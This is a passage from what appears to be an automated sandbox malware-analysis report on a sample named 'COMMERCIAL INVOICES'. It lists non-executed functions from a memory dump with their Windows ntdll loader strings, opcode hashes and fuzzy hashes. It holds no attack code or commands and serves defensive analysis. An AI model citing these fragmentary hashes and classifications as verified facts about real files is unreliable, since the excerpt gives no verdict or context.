                                                                                                                                                                                                                                      • Instruction ID: b54715120fad3f7bd69ae5b5c0ac782ef60fdd684ce88cbc80fb9aa0ec1b2049
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35c6ac851d93258acd4eede8dcbbc904ba5a43902bec412699211a5a1c2aed42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AB09B719125D5C5DF11F7644608717790077D1701F1AC061D3034645F473CC1D1E375

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 012C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-2160512332
                                                                                                                                                                                                                                      • Opcode ID: b27794648d686c3ba5d015869feed2b93529bddccf51f29b5b1f505ca8f1ae53
                                                                                                                                                                                                                                      • Instruction ID: 78a36889d925ae1c506063ff53833a7440ceb4d0b11ca5a00ee1cfe6791facea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b27794648d686c3ba5d015869feed2b93529bddccf51f29b5b1f505ca8f1ae53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85927D71624342EFE725DE28C881B6BB7E8BB84B54F144A1DFB94D7250DB70E844CB92
                                                                                                                                                                                                                                      Function 01278620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 012B5543
                                                                                                                                                                                                                                      • corrupted critical section, xrefs: 012B54C2
                                                                                                                                                                                                                                      • Critical section address, xrefs: 012B5425, 012B54BC, 012B5534
                                                                                                                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012B54E2
                                                                                                                                                                                                                                      • Critical section address., xrefs: 012B5502
                                                                                                                                                                                                                                      • Critical section debug info address, xrefs: 012B541F, 012B552E
                                                                                                                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012B54CE
                                                                                                                                                                                                                                      • double initialized or corrupted critical section, xrefs: 012B5508
                                                                                                                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012B540A, 012B5496, 012B5519
                                                                                                                                                                                                                                      • Thread identifier, xrefs: 012B553A
                                                                                                                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 012B54B6
                                                                                                                                                                                                                                      • 8, xrefs: 012B52E3
                                                                                                                                                                                                                                      • Address of the debug info found in the active list., xrefs: 012B54AE, 012B54FA
                                                                                                                                                                                                                                      • undeleted critical section in freed memory, xrefs: 012B542B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                                                                                                                      • Opcode ID: 8b2cb95860d05f55a7d258d8b8ca9828946b996e33ae056f583bb7c2cd787e8c
                                                                                                                                                                                                                                      • Instruction ID: d156cc1217ed0ebd7cac6f2723e57b84a505e4d0b80becab53a09532fab60a4a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b2cb95860d05f55a7d258d8b8ca9828946b996e33ae056f583bb7c2cd787e8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9818CB0A61359BFEB20CF99D885BAEBBF5FB48714F144119F604BB290D3B5A940CB50
                                                                                                                                                                                                                                      Function 012729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 012B261F
                                                                                                                                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012B22E4
                                                                                                                                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012B2624
                                                                                                                                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012B2409
                                                                                                                                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012B25EB
                                                                                                                                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012B2498
                                                                                                                                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012B24C0
                                                                                                                                                                                                                                      • @, xrefs: 012B259B
                                                                                                                                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012B2506
                                                                                                                                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012B2412
                                                                                                                                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012B2602
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                      • API String ID: 0-4009184096
                                                                                                                                                                                                                                      • Opcode ID: 5b73691344b8253e707e436641b60968a51cee305f3466e8ace0cb61a273134d
                                                                                                                                                                                                                                      • Instruction ID: 8b0b172522b8a2c835fe7e8e07cb7c007449baa5281fac7654f1e5dacf633432
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b73691344b8253e707e436641b60968a51cee305f3466e8ace0cb61a273134d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE0280B1D20229DFDB21DB54CC81BEAB7B8AB54304F0141DAE749A7241EB70AF84CF59
                                                                                                                                                                                                                                      Function 012E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                                                                                                                      • Opcode ID: b3180720dfd4c9abc2ef9bac020351bcde6b5c0f8737b4306fe798e3a414fa34
                                                                                                                                                                                                                                      • Instruction ID: be7f0889df939b4bfca32997d84d04e44f8c80919dad68a56f7b9cd96d15e889
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3180720dfd4c9abc2ef9bac020351bcde6b5c0f8737b4306fe798e3a414fa34
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E951C1715353429BC329DF288848BABBBECEFD9750F54491DEA95C3244E770D504C7A2
                                                                                                                                                                                                                                      Function 012F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                      • API String ID: 0-1700792311
                                                                                                                                                                                                                                      • Opcode ID: 2d5b4e629775609b7ef554d4683ba2f80a0be35d63a509cbe0bfefcbfd1d2191
                                                                                                                                                                                                                                      • Instruction ID: c21b6645d477eeba0358830840948b2689e9d5a410674a897a4e6ed76a4af188
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5b4e629775609b7ef554d4683ba2f80a0be35d63a509cbe0bfefcbfd1d2191
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D1DD71620686DFDB22DF68C441AAAFBF2FF9A700F08806DF6459B652C774D941CB18
                                                                                                                                                                                                                                      Function 012C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 012C8A67
                                                                                                                                                                                                                                      • VerifierDebug, xrefs: 012C8CA5
                                                                                                                                                                                                                                      • HandleTraces, xrefs: 012C8C8F
                                                                                                                                                                                                                                      • VerifierDlls, xrefs: 012C8CBD
                                                                                                                                                                                                                                      • VerifierFlags, xrefs: 012C8C50
                                                                                                                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 012C8A3D
                                                                                                                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 012C8B8F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                                                                                                                      • Opcode ID: ab81798979b9329955ea3120ad4ac5b1b62afbdf24ffa9c5bf04a2c606992b53
                                                                                                                                                                                                                                      • Instruction ID: 57ab6aa259b20181c9e2605be609d897f36707d9b65226a0c80ede83bba73770
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab81798979b9329955ea3120ad4ac5b1b62afbdf24ffa9c5bf04a2c606992b53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 189146B2661716AFD721EF68D881B2A77E8EF94F14F05861CFB40AB240D7709D01CB99
                                                                                                                                                                                                                                      Function 0124EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                      • API String ID: 0-1109411897
                                                                                                                                                                                                                                      • Opcode ID: ec57c8114f23b85e1d8f7b78f80724bb5ec65e15a12ad322609381750fcbcb16
                                                                                                                                                                                                                                      • Instruction ID: 2af2add499433c74e1a036d9de5ebf8c300486f61af67cb6a44b19fc02d16c16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec57c8114f23b85e1d8f7b78f80724bb5ec65e15a12ad322609381750fcbcb16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9A24C70A2566A8FEB68DF18CD887A9BBB5FF85304F5442D9D90DA7250DB749E80CF00
                                                                                                                                                                                                                                      Function 012763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-792281065
                                                                                                                                                                                                                                      • Opcode ID: 7d43e21f22231e7e4bb0c98c68a6488b5f02f6d1373b4208166355ff2833937e
                                                                                                                                                                                                                                      • Instruction ID: ac2f51acccdd3c9d2ad75b74f4c90ddafdb0d59ce8baa69af7e313c7e07adace
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d43e21f22231e7e4bb0c98c68a6488b5f02f6d1373b4208166355ff2833937e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE914970B30752EBEB39EF18E8D5BFA3BA5FB50B54F044128E6016B282D7B49801C795
                                                                                                                                                                                                                                      Function 0123645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01299A2A
                                                                                                                                                                                                                                      • LdrpInitShimEngine, xrefs: 012999F4, 01299A07, 01299A30
                                                                                                                                                                                                                                      • apphelp.dll, xrefs: 01236496
                                                                                                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012999ED
                                                                                                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01299A01
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01299A11, 01299A3A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-204845295
                                                                                                                                                                                                                                      • Opcode ID: 32645fb042ff241603e246d36018dfa3f5c22d2a83cbe4c70033e62a75a8df0a
                                                                                                                                                                                                                                      • Instruction ID: d8da42dd5afe5626c448bb05d1f3bda539c3e9aa6c33e9ce570629d3000440d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32645fb042ff241603e246d36018dfa3f5c22d2a83cbe4c70033e62a75a8df0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA51E371238301AFEB21DF28D881BAB77E8FB84758F00491DF585971A0D774EA44CB96
                                                                                                                                                                                                                                      Function 01272674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012B2180
                                                                                                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 012B2165
                                                                                                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012B21BF
                                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012B2178
                                                                                                                                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 012B2160, 012B219A, 012B21BA
                                                                                                                                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012B219F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                      • API String ID: 0-861424205
                                                                                                                                                                                                                                      • Opcode ID: 0f8d0e597b952c4f76bfceb22bf7cc6860ce61e10306e9d6ea70877d20aae41f
                                                                                                                                                                                                                                      • Instruction ID: cb229342284538e9ef8f109306ab9867fb8912a408ed6d707b26a3bba7b90a34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f8d0e597b952c4f76bfceb22bf7cc6860ce61e10306e9d6ea70877d20aae41f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD31EB36B70325F7E7218A998D86FAFBA79DB65B90F05005DFB0467141D2B0AA01C7A1
                                                                                                                                                                                                                                      Function 0127C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 012B8181, 012B81F5
                                                                                                                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 012B81E5
                                                                                                                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 012B8170
                                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 0127C6C4
                                                                                                                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 012B8177, 012B81EB
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0127C6C3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                                                                                                                      • Opcode ID: ceeaf44f6a29fbe7dd92a362bf488d40aaada27de55e0c6f6f1516c2827eccba
                                                                                                                                                                                                                                      • Instruction ID: df6d62711a9fdf39ace85e359ec7dada180306c167a916fa9485df2b051ca037
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceeaf44f6a29fbe7dd92a362bf488d40aaada27de55e0c6f6f1516c2827eccba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3310371664343AFC224EF29DD86E6B77D8EFD4B50F04051CF984AB291E620EC04CBA2
                                                                                                                                                                                                                                      Function 0128096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 01282DF0: LdrInitializeThunk.NTDLL ref: 01282DFA
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280BA3
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280BB6
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280D60
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01280D74
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1404860816-0
                                                                                                                                                                                                                                      • Opcode ID: e37cc4b43b18ab4a78622b32e339b43dc5017d1b10ecbe987fe8cb808940c968
                                                                                                                                                                                                                                      • Instruction ID: 510463fd952187050920006416c4a19844309a24d22f5784d23817b9393c0f20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e37cc4b43b18ab4a78622b32e339b43dc5017d1b10ecbe987fe8cb808940c968
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6426E71911716DFDB61DF28C881BAAB7F4FF04314F1445A9EA89EB281E770A984CF60
                                                                                                                                                                                                                                      Function 0124A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                      • API String ID: 0-379654539
                                                                                                                                                                                                                                      • Opcode ID: 11f0408c581a1536fd781ce0e9f0c82de289065b0686a69cd2e68c8549ae3ee2
                                                                                                                                                                                                                                      • Instruction ID: 6f2d18c4c8b29636fa55b70983356db5b2dc582918199c10b2d2181fcb95ab25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11f0408c581a1536fd781ce0e9f0c82de289065b0686a69cd2e68c8549ae3ee2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABC1BC74568382CFD729CF58C140B6AB7E4FF84704F04496AFA968B291E774C949CBA2
                                                                                                                                                                                                                                      Function 01278402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • @, xrefs: 01278591
                                                                                                                                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0127855E
                                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 01278422
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01278421
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-1918872054
                                                                                                                                                                                                                                      • Opcode ID: 494392e066ffc0763318a5b2a5d014b4fcff60dde8f7cb405d3ba61aa61a6ea9
                                                                                                                                                                                                                                      • Instruction ID: feb409cfc8b08eac5fd2f4e75b95148002b4c7c753403ec2e9272bd106f33c46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 494392e066ffc0763318a5b2a5d014b4fcff60dde8f7cb405d3ba61aa61a6ea9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A91A971569346AFD721EF25C885FABBAECFF84784F40092EFA8496141E370D904CB62
                                                                                                                                                                                                                                      Function 0127273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012B21D9, 012B22B1
                                                                                                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012B22B6
                                                                                                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 012B21DE
                                                                                                                                                                                                                                      • .Local, xrefs: 012728D8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
